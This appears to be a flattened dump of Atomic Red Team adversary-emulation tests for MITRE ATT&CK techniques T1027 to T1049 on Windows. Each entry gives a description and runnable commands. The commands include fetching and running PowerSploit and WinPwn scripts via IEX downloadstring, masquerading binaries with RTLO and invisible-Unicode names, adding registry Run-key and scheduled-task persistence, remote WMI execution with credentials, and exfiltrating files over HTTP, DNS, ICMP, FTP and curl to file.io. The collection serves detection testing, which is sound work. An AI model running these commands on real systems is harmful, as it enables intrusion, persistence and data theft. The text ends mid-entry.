$encryptedString = "76492d1116743f0423413b16050a5345MgB8AGkASwA0AHMAbwBXAFoAagBkAFoATABXAGIAdAA5AFcAWAB1AFMANABVAEEAPQA9AHwAZQBjAGMANgAwADQAZAA0AGQAMQAwADUAYgA4ADAAMgBmADkAZgBjADEANQBjAGMANQBiAGMANwA2AGYANQBmADUANABhAGIAYgAyAGMANQA1AGQAMgA5ADEANABkADUAMgBiAGMANgA2AGMAMAAxADUAZABjADAAOABjAGIANAA1ADUANwBjADcAZQBlAGQAYgAxADEAOQA4AGIAMwAwADMANwAwADAANQA2ADQAOAA4ADkAZgA4ADMAZQA4ADgAOQBiAGEAMAA2ADMAMQAyADYAMwBiAGUAMAAxADgANAA0ADYAOAAxADQANQAwAGUANwBkADkANABjADcANQAxADgAYQA2ADMANQA4AGIAYgA1ADkANQAzAGIAMwAxADYAOAAwADQAMgBmADcAZQBjADYANQA5AGIANwBkADUAOAAyAGEAMgBiADEAMQAzAGQANABkADkAZgA3ADMAMABiADgAOQAxADAANAA4ADcAOQA5ADEAYQA1ADYAZAAzADQANwA3AGYANgAyADcAMAAwADEAMQA4ADEAZgA5ADUAYgBmAGYANQA3ADQAZQA4AGUAMAAxADUANwAwAGQANABiADMAMwA2ADgANwA0AGIANwAyADMAMQBhADkAZABhADEANQAzADQAMgAzADEANwAxADAAZgAxADkAYQA1ADEAMQA="
$key = [byte]1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32
$decrypt = ConvertTo-SecureString -String $encryptedString -Key $key
$decryptedString = [Runtime.InteropServices.Marshal]::PtrToStringBSTR([Runtime.InteropServices.Marshal]::SecureStringToBSTR($decrypt))
#Write the decrypted eicar string to a file
$decryptedString | Out-File $env:temp\T1027.013_decryptedEicar.txt
T1027.018 powershell windows File Masquerading with Zero-Width Space
Invisible Unicode
Creates a file named 'secret.txt' but inserts a Zero-Width Space (U+200B) before the extension. This emulates how adversaries hide malicious files in plain sight, as they appear identical to legitimate files in File Explorer.
$fileName = "secret" + [char]0x200B + ".txt"
New-Item -Path "$env:TEMP\$fileName" -ItemType "file" -Value "Hidden Unicode Content" -Force
Write-Host "Created file: $env:TEMP\$fileName"
T1027.018 powershell windows Invisible Unicode in Environment Variables
Invisible Unicode
Sets an environment variable that includes a Zero-Width Non-Joiner (U+200C). This emulates techniques used to hide configuration data or persistence paths from administrators performing manual audits.
$varName = "PATH" + [char]0x200C
[Environment]::SetEnvironmentVariable($varName, "C:\Users\Public\Malicious", "User")
Write-Host "Hidden environment variable '$varName' set."
T1027.018 powershell windows Binary Masquerading via Invisible Unicode
Invisible Unicode
Copies a system binary (calc.exe) to a new name containing an invisible character (U+200D) and executes it. This tests the ability of EDRs to handle non-normalized file paths in process execution events.
$hiddentarget = "$env:TEMP\calc" + [char]0x200D + ".exe"
Copy-Item "C:\Windows\System32\calc.exe" -Destination $hiddentarget
Start-Process $hiddentarget
T1030 powershell windows Network-Based Data Transfer in Small Chunks
Data Transfer Size Limits
Simulate transferring data over a network in small chunks to evade detection.
$file = [System.IO.File]::OpenRead(#{source_file_path})
$chunkSize = #{chunk_size} * 1KB
$buffer = New-Object Byte[] $chunkSize

while ($bytesRead = $file.Read($buffer, 0, $buffer.Length)) {
    $encodedChunk = [Convert]::ToBase64String($buffer, 0, $bytesRead)
    Invoke-WebRequest -Uri #{destination_url} -Method Post -Body $encodedChunk
}
$file.Close()
T1033 command_prompt windows System Owner/User Discovery
System Owner/User Discovery
Identify System owner or users on an endpoint. Upon successful execution, cmd.exe will spawn multiple commands against a target host to identify usernames. Output will be via stdout. Additionally, two files will be written to disk - computers.txt and usernames.txt.
cmd.exe /C whoami
wmic useraccount get /ALL
quser /SERVER:"#{computer_name}"
quser
qwinsta.exe /server:#{computer_name}
qwinsta.exe
for /F "tokens=1,2" %i in ('qwinsta /server:#{computer_name} ^| findstr "Active Disc"') do @echo %i | find /v "#" | find /v "console" || echo %j > computers.txt
@FOR /F %n in (computers.txt) DO @FOR /F "tokens=1,2" %i in ('qwinsta /server:%n ^| findstr "Active Disc"') do @echo %i | find /v "#" | find /v "console" || echo %j > usernames.txt
T1033 powershell windows Find computers where user has session - Stealth mode (PowerView)
System Owner/User Discovery
Find existing user session on other computers. Upon execution, information about any sessions discovered will be displayed.
[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12
IEX (IWR 'https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/f94a5d298a1b4c5dfb1f30a246d9c73d13b22888/Recon/PowerView.ps1' -UseBasicParsing); Invoke-UserHunter -Stealth -Verbose
T1033 powershell windows User Discovery With Env Vars PowerShell Script
System Owner/User Discovery
Use the PowerShell environment variables to identify the current logged user.
[System.Environment]::UserName | Out-File -FilePath .\CurrentactiveUser.txt 
$env:UserName | Out-File -FilePath .\CurrentactiveUser.txt -Append
T1033 powershell windows GetCurrent User with PowerShell Script
System Owner/User Discovery
Use the PowerShell "GetCurrent" method of the WindowsIdentity .NET class to identify the logged user.
[System.Security.Principal.WindowsIdentity]::GetCurrent() | Out-File -FilePath .\CurrentUserObject.txt
T1033 powershell windows System Discovery - SocGholish whoami
System Owner/User Discovery
SocGholish performs whoami discovery commands and outputs the results to a tmp file. The test will generate a filename similar to the random one generated during execution and write the file to AppData\Temp. Reference: https://redcanary.com/threat-detection-report/threats/socgholish/
$TokenSet = @{
  U = [Char[]]'ABCDEFGHIJKLMNOPQRSTUVWXYZ'
  N = [Char[]]'0123456789'
}
$Upper = Get-Random -Count 5 -InputObject $TokenSet.U
$Number = Get-Random -Count 5 -InputObject $TokenSet.N
$StringSet = $Upper + $Number
$rad = (Get-Random -Count 5 -InputObject $StringSet) -join ''
$file = "rad" + $rad + ".tmp"

whoami.exe /all >> #{output_path}\$file
T1033 command_prompt windows System Owner/User Discovery Using Command Prompt
System Owner/User Discovery
Identify the system owner or current user using native Windows command prompt utilities.
set file=#{output_file_path}\user_info_%random%.tmp
echo Username: %USERNAME% > %file%
echo User Domain: %USERDOMAIN% >> %file%
net users >> %file%
query user >> %file%
T1036 powershell windows System File Copied to Unusual Location
Masquerading
It may be suspicious seeing a file copy of an EXE in System32 or SysWOW64 to a non-system directory or executing from a non-system directory.
copy-item "$env:windir\System32\cmd.exe" -destination "$env:allusersprofile\cmd.exe"
start-process "$env:allusersprofile\cmd.exe"
sleep -s 5 
stop-process -name "cmd" | out-null
T1036 powershell windows Malware Masquerading and Execution from Zip File
Masquerading
When the file is unzipped and the README.cmd file opened, it executes and changes the .pdf to .dll and executes the dll. This is a BazaLoader technique [as reported here](https://twitter.com/ffforward/status/1481672378639912960)
Expand-Archive -Path "PathToAtomicsFolder\..\ExternalPayloads\T1036.zip" -DestinationPath "$env:userprofile\Downloads\T1036" -Force
cd "$env:userprofile\Downloads\T1036"
cmd /c "$env:userprofile\Downloads\T1036\README.cmd" >$null 2>$null
T1036.002 powershell windows Masquerading: Right-to-Left Override Batch File Creation and Execution
Right-to-Left Override
'Creates a batch file and then uses the RTLO operator (0x202E) to transform the file name from "evil_batchfdp.bat" to "evil_batchtab.pdf". The script then executes the batch file which displays "Hello World!" for 30 seconds before closing out.'
$filepath = #{fileloc}
$rtlo = [char]0x202E
$fileloc = Join-Path "$filepath" ("evil_batch" + $rtlo + "fdp.bat")
$payload = @"
@echo off
echo Hello World!
timeout /t 30 /nobreak
exit
"@
Set-Content -Path $fileloc -Value $payload -Encoding Ascii -Force
Write-Host "Real filename on disk: $fileloc"
Write-Host "Displays in explorer as: evil_batchtab.pdf"
Start-Process -FilePath $fileloc -Wait
T1036.002 powershell windows Masquerading: RTLO Masqueraded File Download and Execution
Right-to-Left Override
Downloads a batch file that has an obfuscated name utilizing the RTLO operator. The batch file then runs automatically, opening a cmd window and then closing 30 seconds later
$rtlo = [char]0x202E
$filepath = #{fileloc}
$fileloc = Join-Path "$filepath" ("evil_batch" + $rtlo + "fdp.bat")
Invoke-WebRequest -Uri "https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1036.002/src/evil_batch.bat" -OutFile $fileloc -UseBasicParsing | Out-Null
Start-Process -FilePath $fileloc
T1036.003 command_prompt windows Masquerading as Windows LSASS process
Rename Legitimate Utilities
Copies cmd.exe, renames it, and launches it to masquerade as an instance of lsass.exe. Upon execution, cmd will be launched by powershell. If using Invoke-AtomicTest, The test will hang until the 120 second timeout cancels the session
copy %SystemRoot%\System32\cmd.exe %SystemRoot%\Temp\lsass.exe
%SystemRoot%\Temp\lsass.exe /B
T1036.003 command_prompt windows Masquerading - cscript.exe running as notepad.exe
Rename Legitimate Utilities
Copies cscript.exe, renames it, and launches it to masquerade as an instance of notepad.exe. Upon successful execution, cscript.exe is renamed as notepad.exe and executed from non-standard path.
copy %SystemRoot%\System32\cscript.exe %APPDATA%\notepad.exe /Y
cmd.exe /c %APPDATA%\notepad.exe /B
T1036.003 command_prompt windows Masquerading - wscript.exe running as svchost.exe
Rename Legitimate Utilities
Copies wscript.exe, renames it, and launches it to masquerade as an instance of svchost.exe. Upon execution, no windows will remain open but wscript will have been renamed to svchost and ran out of the temp folder
copy %SystemRoot%\System32\wscript.exe %APPDATA%\svchost.exe /Y
cmd.exe /c %APPDATA%\svchost.exe "PathToAtomicsFolder\..\ExternalPayloads\T1036.003\src\T1036.003_masquerading.vbs"
T1036.003 command_prompt windows Masquerading - powershell.exe running as taskhostw.exe
Rename Legitimate Utilities
Copies powershell.exe, renames it, and launches it to masquerade as an instance of taskhostw.exe. Upon successful execution, powershell.exe is renamed as taskhostw.exe and executed from non-standard path.
copy %windir%\System32\windowspowershell\v1.0\powershell.exe %APPDATA%\taskhostw.exe /Y
cmd.exe /K %APPDATA%\taskhostw.exe
T1036.003 powershell windows Masquerading - non-windows exe running as windows exe
Rename Legitimate Utilities
Copies an exe, renames it as a windows exe, and launches it to masquerade as a real windows exe Upon successful execution, powershell will execute T1036.003.exe as svchost.exe from on a non-standard path.
copy "#{inputfile}" #{outputfile}
try { $myT1036_003 = (Start-Process -PassThru -FilePath #{outputfile}).Id }
catch { $_; exit $_.Exception.HResult}
Stop-Process -ID $myT1036_003
T1036.003 powershell windows Masquerading - windows exe running as different windows exe
Rename Legitimate Utilities
Copies a windows exe, renames it as another windows exe, and launches it to masquerade as second windows exe
copy "#{inputfile}" #{outputfile}
$myT1036_003 = (Start-Process -PassThru -FilePath #{outputfile}).Id
Stop-Process -ID $myT1036_003
T1036.003 command_prompt elevated windows Malicious process Masquerading as LSM.exe
Rename Legitimate Utilities
Detect LSM running from an incorrect directory and an incorrect service account This works by copying cmd.exe to a file, naming it lsm.exe, then copying a file to the C:\ folder. Upon successful execution, cmd.exe will be renamed as lsm.exe and executed from non-standard path.
copy C:\Windows\System32\cmd.exe C:\lsm.exe
C:\lsm.exe /c echo T1036.003 > C:\T1036.003.txt
T1036.004 command_prompt elevated windows Creating W32Time similar named service using schtasks
Masquerade Task or Service
Creating W32Time similar named service (win32times) using schtasks just like threat actor dubbed "Operation Wocao"
schtasks /create /ru system /sc daily /tr "cmd /c powershell.exe -ep bypass -file c:\T1036.004_NonExistingScript.ps1" /tn win32times /f
schtasks /query /tn win32times
T1036.004 command_prompt elevated windows Creating W32Time similar named service using sc
Masquerade Task or Service
Creating W32Time similar named service (win32times) using sc just like threat actor dubbed "Operation Wocao"
sc create win32times binPath= "cmd /c start c:\T1036.004_NonExistingScript.ps1"
sc qc win32times
T1036.005 powershell windows Masquerade as a built-in system executable
Match Legitimate Resource Name or Location
Launch an executable that attempts to masquerade as a legitimate executable.
Add-Type -TypeDefinition @'
public class Test {
    public static void Main(string[] args) {
        System.Console.WriteLine("tweet, tweet");
    }
}
'@ -OutputAssembly "#{executable_filepath}"

Start-Process -FilePath "#{executable_filepath}"
T1036.005 powershell elevated windows Masquerading cmd.exe as VEDetector.exe
Match Legitimate Resource Name or Location
This test simulates an adversary renaming cmd.exe to VEDetector.exe to masquerade as a legitimate application. The test copies cmd.exe, renames it to VEDetector.exe, adds a registry run key for persistence, and executes the renamed binary. This technique may be used to evade detection by mimicking legitimate software names or locations. Expected Output: - A new process named VEDetector.exe appears in the process list, but its behavior matches cmd.exe. - SIEM/EDR systems may detect this as suspicious process activity (e.g., Sysmon Event ID 1 for process creation, or Event ID 13 for registry modifications). - Registry modification in HKLM:\Software\Microsoft\Windows\CurrentVersion\Run may trigger persistence alerts in XDR platforms. References: - [MITRE ATT&CK T1036.005](https://attack.mitre.org/techniques/T1036/005/) - [Sysmon Process Creation](https://docs.microsoft.com/en-us/sysinternals/downloads/sysmon)
# Copy and rename cmd.exe to VEDetector.exe
Copy-Item -Path "#{source_file}" -Destination "#{ved_path}\VEDetector.exe" -Force

# Create registry run key for persistence
New-ItemProperty -Path "HKLM:\Software\Microsoft\Windows\CurrentVersion\Run" -Name "VEDetector" -Value "#{ved_path}\VEDetector.exe" -PropertyType String -Force

# Start the renamed process
Start-Process -FilePath "#{ved_path}\VEDetector.exe"

Start-Sleep -Seconds 5
T1036.007 command_prompt windows File Extension Masquerading
Double File Extension
download and execute a file masquerading as images or Office files. Upon execution 3 calc instances and 3 vbs windows will be launched. e.g SOME_LEGIT_NAME.[doc,docx,xls,xlsx,pdf,rtf,png,jpg,etc.].[exe,vbs,js,ps1,etc] (Quartelyreport.docx.exe)
copy "#{exe_path}" %temp%\T1036.007_masquerading.docx.exe /Y
copy "#{exe_path}" %temp%\T1036.007_masquerading.pdf.exe /Y
copy "#{exe_path}" %temp%\T1036.007_masquerading.ps1.exe /Y
copy "#{vbs_path}" %temp%\T1036.007_masquerading.xls.vbs /Y
copy "#{vbs_path}" %temp%\T1036.007_masquerading.xlsx.vbs /Y
copy "#{vbs_path}" %temp%\T1036.007_masquerading.png.vbs /Y
copy "#{ps1_path}" %temp%\T1036.007_masquerading.doc.ps1 /Y
copy "#{ps1_path}" %temp%\T1036.007_masquerading.pdf.ps1 /Y
copy "#{ps1_path}" %temp%\T1036.007_masquerading.rtf.ps1 /Y
%temp%\T1036.007_masquerading.docx.exe
%temp%\T1036.007_masquerading.pdf.exe
%temp%\T1036.007_masquerading.ps1.exe
%temp%\T1036.007_masquerading.xls.vbs
%temp%\T1036.007_masquerading.xlsx.vbs
%temp%\T1036.007_masquerading.png.vbs
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -File %temp%\T1036.007_masquerading.doc.ps1
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -File %temp%\T1036.007_masquerading.pdf.ps1
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -File %temp%\T1036.007_masquerading.rtf.ps1
T1037.001 command_prompt windows Logon Scripts
Logon Script (Windows)
Adds a registry value to run batch script created in the %temp% directory. Upon execution, there will be a new environment variable in the HKCU\Environment key that can be viewed in the Registry Editor.
echo "#{script_command}" > #{script_path}
REG.exe ADD HKCU\Environment /v UserInitMprLogonScript /t REG_SZ /d "#{script_path}" /f
T1039 command_prompt elevated windows Copy a sensitive File over Administrative share with copy
Data from Network Shared Drive
Copy from sensitive File from the c$ of another LAN computer with copy cmd https://twitter.com/SBousseaden/status/1211636381086339073
copy \\#{remote}\C$\#{share_file} %TEMP%\#{local_file}
T1039 powershell elevated windows Copy a sensitive File over Administrative share with Powershell
Data from Network Shared Drive
Copy from sensitive File from the c$ of another LAN computer with powershell https://twitter.com/SBousseaden/status/1211636381086339073
copy-item -Path "\\#{remote}\C$\#{share_file}" -Destination "$Env:TEMP\#{local_file}"
T1040 command_prompt elevated windows Packet Capture Windows Command Prompt
Network Sniffing
Perform a packet capture using the windows command prompt. This will require a host that has Wireshark/Tshark installed. Upon successful execution, tshark will execute and capture 5 packets on interface "Ethernet".
"c:\Program Files\Wireshark\tshark.exe" -i #{interface} -c 5
T1040 command_prompt elevated windows Windows Internal Packet Capture
Network Sniffing
Uses the built-in Windows packet capture After execution you should find a file named trace.etl and trace.cab in the temp directory
netsh trace start capture=yes tracefile=%temp%\trace.etl maxsize=10
T1040 command_prompt elevated windows Windows Internal pktmon capture
Network Sniffing
Will start a packet capture and store log file as t1040.etl. https://lolbas-project.github.io/lolbas/Binaries/Pktmon/
pktmon.exe start --etw  -f %TEMP%\t1040.etl
TIMEOUT /T 5 >nul 2>&1
pktmon.exe stop
T1040 command_prompt elevated windows Windows Internal pktmon set filter
Network Sniffing
Select Desired ports for packet capture https://lolbas-project.github.io/lolbas/Binaries/Pktmon/
pktmon.exe filter add -p 445
T1040 powershell elevated windows PowerShell Network Sniffing
Network Sniffing
PowerShell Built-in Cmdlets to capture network traffic. https://learn.microsoft.com/en-us/powershell/module/neteventpacketcapture/new-neteventsession?view=windowsserver2022-ps
New-NetEventSession -Name Capture007 -LocalFilePath "$ENV:Temp\sniff.etl"
Add-NetEventPacketCaptureProvider -SessionName Capture007 -TruncationLength 100
Start-NetEventSession -Name Capture007
Stop-NetEventSession -Name Capture007
Remove-NetEventSession -Name Capture007
T1041 powershell windows C2 Data Exfiltration
Exfiltration Over C2 Channel
Exfiltrates a file present on the victim machine to the C2 server.
if(-not (Test-Path #{filepath})){ 
  1..100 | ForEach-Object { Add-Content -Path #{filepath} -Value "This is line $_." }
}
[System.Net.ServicePointManager]::Expect100Continue = $false
$filecontent = Get-Content -Path #{filepath}
Invoke-WebRequest -Uri #{destination_url} -Method POST -Body $filecontent -DisableKeepAlive
T1041 powershell windows Text Based Data Exfiltration using DNS subdomains
Exfiltration Over C2 Channel
Simulates an adversary using DNS tunneling to exfiltrate data over a Command and Control (C2) channel.
$dnsServer = "#{dns_server}"
$exfiltratedData = "#{exfiltrated_data}"
$chunkSize = #{chunk_size}

$encodedData = [System.Text.Encoding]::UTF8.GetBytes($exfiltratedData)
$encodedData = [Convert]::ToBase64String($encodedData)
$chunks = $encodedData -split "(.{$chunkSize})"

foreach ($chunk in $chunks) {
    $dnsQuery = $chunk + "." + $dnsServer
    Resolve-DnsName -Name $dnsQuery
    Start-Sleep -Seconds 5
}
T1046 powershell elevated windows Port Scan NMap for Windows
Network Service Discovery
Scan ports to check for listening ports for the local host 127.0.0.1
nmap #{host_to_scan}
T1046 powershell windows Port Scan using python
Network Service Discovery
Scan ports to check for listening ports with python
python "#{filename}" -i #{host_ip}
T1046 powershell windows WinPwn - spoolvulnscan
Network Service Discovery
Start MS-RPRN RPC Service Scan using spoolvulnscan function of WinPwn
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
spoolvulnscan -noninteractive -consoleoutput
T1046 powershell windows WinPwn - MS17-10
Network Service Discovery
Search for MS17-10 vulnerable Windows Servers in the domain using powerSQL function of WinPwn
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
MS17-10 -noninteractive -consoleoutput
T1046 powershell windows WinPwn - bluekeep
Network Service Discovery
Search for bluekeep vulnerable Windows Systems in the domain using bluekeep function of WinPwn. Can take many minutes to complete (~600 seconds in testing on a small domain).
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
bluekeep -noninteractive -consoleoutput
T1046 powershell windows WinPwn - fruit
Network Service Discovery
Search for potentially vulnerable web apps (low hanging fruits) using fruit function of WinPwn
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
fruit -noninteractive -consoleoutput
T1046 powershell windows Port-Scanning /24 Subnet with PowerShell
Network Service Discovery
Scanning common ports in a /24 subnet. If no IP address for the target subnet is specified the test tries to determine the attacking machine's "primary" IPv4 address first and then scans that address with a /24 netmask. The connection attempts to use a timeout parameter in milliseconds to speed up the scan. Please note the atomic might not print any output until the scans are completed.
$ipAddr = "#{ip_address}"
if ($ipAddr -like "*,*") {
    $ip_list = $ipAddr -split ","
    $ip_list = $ip_list.ForEach({ $_.Trim() })
    Write-Host "[i] IP Address List: $ip_list"

    $ports = #{port_list}

    foreach ($ip in $ip_list) {
        foreach ($port in $ports) {
            Write-Host "[i] Establishing connection to: $ip : $port"
            try {
                $tcp = New-Object Net.Sockets.TcpClient
                $tcp.ConnectAsync($ip, $port).Wait(#{timeout_ms}) | Out-Null
            } catch {}
            if ($tcp.Connected) {
                $tcp.Close()
                Write-Host "Port $port is open on $ip"
            }
        }
    }
} elseif ($ipAddr -notlike "*,*") {
    if ($ipAddr -eq "") {
        # Assumes the "primary" interface is shown at the top
        $interface = Get-NetIPInterface -AddressFamily IPv4 -ConnectionState Connected | Select-Object -ExpandProperty InterfaceAlias -First 1
        Write-Host "[i] Using Interface $interface"
        $ipAddr = Get-NetIPAddress -AddressFamily IPv4 -InterfaceAlias $interface | Select-Object -ExpandProperty IPAddress
    }
    Write-Host "[i] Base IP-Address for Subnet: $ipAddr"
    $subnetSubstring = $ipAddr.Substring(0, $ipAddr.LastIndexOf('.') + 1)
    # Always assumes /24 subnet
    Write-Host "[i] Assuming /24 subnet. scanning $subnetSubstring'1' to $subnetSubstring'254'"

    $ports = #{port_list}
    $subnetIPs = 1..254 | ForEach-Object { "$subnetSubstring$_" }

    foreach ($ip in $subnetIPs) {
        foreach ($port in $ports) {
            try {
                $tcp = New-Object Net.Sockets.TcpClient
                $tcp.ConnectAsync($ip, $port).Wait(#{timeout_ms}) | Out-Null
            } catch {}
            if ($tcp.Connected) {
                $tcp.Close()
                Write-Host "Port $port is open on $ip"
            }
        }
    }
} else {
    Write-Host "[Error] Invalid Inputs"
    exit 1
}
T1046 powershell elevated windows Remote Desktop Services Discovery via PowerShell
Network Service Discovery
Availability of remote desktop services can be checked using get- cmdlet of PowerShell
Get-Service -Name "Remote Desktop Services", "Remote Desktop Configuration"
T1047 command_prompt windows WMI Reconnaissance Users
Windows Management Instrumentation
An adversary might use WMI to list all local User Accounts. When the test completes , there should be local user accounts information displayed on the command line.
wmic useraccount get /ALL /format:csv
T1047 command_prompt windows WMI Reconnaissance Processes
Windows Management Instrumentation
An adversary might use WMI to list Processes running on the compromised host. When the test completes , there should be running processes listed on the command line.
wmic process get caption,executablepath,commandline /format:csv
T1047 command_prompt windows WMI Reconnaissance Software
Windows Management Instrumentation
An adversary might use WMI to list installed Software hotfix and patches. When the test completes, there should be a list of installed patches and when they were installed.
wmic qfe get description,installedOn /format:csv
T1047 command_prompt windows WMI Reconnaissance List Remote Services
Windows Management Instrumentation
An adversary might use WMI to check if a certain Remote Service is running on a remote device. When the test completes, a service information will be displayed on the screen if it exists. A common feedback message is that "No instance(s) Available" if the service queried is not running. A common error message is "Node - (provided IP or default) ERROR Description =The RPC server is unavailable" if the provided remote host is unreachable
wmic /node:"#{node}" service where (caption like "%#{service_search_string}%")
T1047 command_prompt windows WMI Execute Local Process
Windows Management Instrumentation
This test uses wmic.exe to execute a process on the local host. When the test completes , a new process will be started locally .A notepad application will be started when input is left on default.
wmic process call create #{process_to_execute}
T1047 command_prompt windows WMI Execute Remote Process
Windows Management Instrumentation
This test uses wmic.exe to execute a process on a remote host. Specify a valid value for remote IP using the node parameter. To clean up, provide the same node input as the one provided to run the test A common error message is "Node - (provided IP or default) ERROR Description =The RPC server is unavailable" if the default or provided IP is unreachable
wmic /user:#{user_name} /password:#{password} /node:"#{node}" process call create #{process_to_execute}
T1047 command_prompt windows Create a Process using WMI Query and an Encoded Command
Windows Management Instrumentation
Solarigate persistence is achieved via backdoors deployed via various techniques including using PowerShell with an EncodedCommand Powershell -nop -exec bypass -EncodedCommand <encoded command> Where the -EncodedCommand, once decoded, would resemble: Invoke-WMIMethod win32_process -name create -argumentlist ‘rundll32 c:\windows\idmu\common\ypprop.dll _XInitImageFuncPtrs’ -ComputerName WORKSTATION The EncodedCommand in this atomic is the following: Invoke-WmiMethod -Path win32_process -Name create -ArgumentList notepad.exe You should expect to see notepad.exe running after execution of this test. [Solarigate Analysis from Microsoft](https://www.microsoft.com/security/blog/2020/12/18/analyzing-solorigate-the-compromised-dll-file-that-started-a-sophisticated-cyberattack-and-how-microsoft-defender-helps-protect/)
powershell -exec bypass -e SQBuAHYAbwBrAGUALQBXAG0AaQBNAGUAdABoAG8AZAAgAC0AUABhAHQAaAAgAHcAaQBuADMAMgBfAHAAcgBvAGMAZQBzAHMAIAAtAE4AYQBtAGUAIABjAHIAZQBhAHQAZQAgAC0AQQByAGcAdQBtAGUAbgB0AEwAaQBzAHQAIABuAG8AdABlAHAAYQBkAC4AZQB4AGUA
T1047 powershell elevated windows Create a Process using obfuscated Win32_Process
Windows Management Instrumentation
This test tries to mask process creation by creating a new class that inherits from Win32_Process. Indirect call of suspicious method such as Win32_Process::Create can break detection logic. [Cybereason blog post No Win32_ProcessNeeded](https://www.cybereason.com/blog/wmi-lateral-movement-win32)
$Class = New-Object Management.ManagementClass(New-Object Management.ManagementPath("Win32_Process"))
$NewClass = $Class.Derive("#{new_class}")
$NewClass.Put()
Invoke-WmiMethod -Path #{new_class} -Name create -ArgumentList #{process_to_execute}
T1047 command_prompt windows WMI Execute rundll32
Windows Management Instrumentation
This test uses wmic.exe to execute a DLL function using rundll32. Specify a valid value for remote IP using the node parameter.
wmic /node:#{node} process call create "rundll32.exe \"#{dll_to_execute}\" #{function_to_execute}"
T1047 command_prompt elevated windows Application uninstall using WMIC
Windows Management Instrumentation
Emulates uninstalling applications using WMIC. This method only works if the product was installed with an msi file. APTs have been seen using this to uninstall security products.
wmic /node:"#{node}" product where "name like '#{product}%%'" call uninstall
T1048 powershell windows DNSExfiltration (doh)
Exfiltration Over Alternative Protocol
DNSExfiltrator enables the transfer (exfiltration) of a file over a DNS request covert channel. This is basically a data leak testing tool allowing to exfiltrate data over a covert channel. !!! Test will fail without a domain under your control with A record and NS record !!! See this github page for more details - https://github.com/Arno0x/DNSExfiltrator
Import-Module "#{ps_module}"
Invoke-DNSExfiltrator -i "#{ps_module}" -d #{domain} -p #{password} -doh #{doh} -t #{time} #{encoding}
T1048.002 command_prompt windows Exfiltrate data HTTPS using curl windows
Exfiltration Over Asymmetric Encrypted Non-C2 Protocol
Exfiltrate data HTTPS using curl to file share site file.io
#{curl_path} -k -F "file=@#{input_file}" https://file.io/
T1048.003 powershell windows Exfiltration Over Alternative Protocol - ICMP
Exfiltration Over Unencrypted Non-C2 Protocol
Exfiltration of specified file over ICMP protocol. Upon successful execution, powershell will utilize ping (icmp) to exfiltrate notepad.exe to a remote address (default 127.0.0.1). Results will be via stdout.
$ping = New-Object System.Net.Networkinformation.ping; foreach($Data in Get-Content -Path #{input_file} -Encoding Byte -ReadCount 1024) { $ping.Send("#{ip_address}", 1500, $Data) }
T1048.003 powershell windows Exfiltration Over Alternative Protocol - HTTP
Exfiltration Over Unencrypted Non-C2 Protocol
Exfiltration of specified file over HTTP. Upon successful execution, powershell will invoke web request using POST method to exfiltrate notepad.exe to a remote address (default http://127.0.0.1). Results will be via stdout.
$content = Get-Content #{input_file}
Invoke-WebRequest -Uri #{ip_address} -Method POST -Body $content
T1048.003 powershell windows Exfiltration Over Alternative Protocol - SMTP
Exfiltration Over Unencrypted Non-C2 Protocol
Exfiltration of specified file over SMTP. Upon successful execution, powershell will send an email with attached file to exfiltrate to a remote address. Results will be via stdout.
Send-MailMessage -From #{sender} -To #{receiver} -Subject "T1048.003 Atomic Test" -Attachments #{input_file} -SmtpServer #{smtp_server}
T1048.003 powershell windows MAZE FTP Upload
Exfiltration Over Unencrypted Non-C2 Protocol
This test simulates MAZE's ransomware's ability to exfiltrate data via FTP. Upon successful execution, all 7z files within the %windir%\temp directory will be uploaded to a remote FTP server. Reference: https://www.mandiant.com/resources/tactics-techniques-procedures-associated-with-maze-ransomware-incidents
$Dir_to_copy = "$env:windir\temp"
$ftp = "ftp://#{ftp_server}/"
$web_client = New-Object System.Net.WebClient
$web_client.Credentials = New-Object System.Net.NetworkCredential('#{username}', '#{password}')
if (test-connection -count 1 -computername "#{ftp_server}" -quiet)
{foreach($file in (dir $Dir_to_copy "*.7z"))
{echo "Uploading $file..."
$uri = New-Object System.Uri($ftp+$file.name)
$web_client.UploadFile($uri, $file.FullName)}}
else
{echo "FTP Server Unreachable. Please verify the server address in input args and try again."}
T1048.003 powershell elevated windows Exfiltration Over Alternative Protocol - FTP - Rclone
Exfiltration Over Unencrypted Non-C2 Protocol
Rclone may be used by an adversary to exfiltrate data to a publicly hosted FTP server. [Reference](https://thedfirreport.com/2021/03/29/sodinokibi-aka-revil-ransomware/)
$rclone_bin = Get-ChildItem C:\Users\Public\Downloads\ -Recurse -Include "rclone.exe" | Select-Object -ExpandProperty FullName
$exfil_pack = Get-ChildItem C:\Users\Public\Downloads\ -Recurse -Include "exfil.zip" | Select-Object -ExpandProperty FullName
&$rclone_bin config create ftpserver "ftp" "host" #{ftp_server} "port" #{ftp_port} "user" #{ftp_user} "pass" #{ftp_pass}
&$rclone_bin copy --max-age 2y $exfil_pack ftpserver --bwlimit 2M -q --ignore-existing --auto-confirm --multi-thread-streams 12 --transfers 12 -P --ftp-no-check-certificate
T1049 command_prompt windows System Network Connections Discovery
System Network Connections Discovery
Get a listing of network connections. Upon successful execution, cmd.exe will execute netstat, net use and net sessions. net sessions requires elevated privileges; on standard user accounts this command may not return results. Results will output via stdout.
netstat -ano
net use
net sessions 2>nul
T1049 powershell windows System Network Connections Discovery with PowerShell
System Network Connections Discovery
Get a listing of network connections. Upon successful execution, powershell.exe will execute get-NetTCPConnection. Results will output via stdout.
Get-NetTCPConnection
T1049 powershell windows System Network Connections Discovery via PowerShell (Process Mapping)
System Network Connections Discovery
